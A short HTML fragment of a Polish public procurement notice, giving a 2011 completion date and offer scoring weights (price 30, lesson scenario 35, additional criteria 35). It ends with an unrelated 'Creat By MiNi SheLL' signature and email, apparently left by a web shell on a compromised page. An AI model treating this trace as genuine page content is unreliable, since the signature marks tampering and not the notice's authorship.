<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com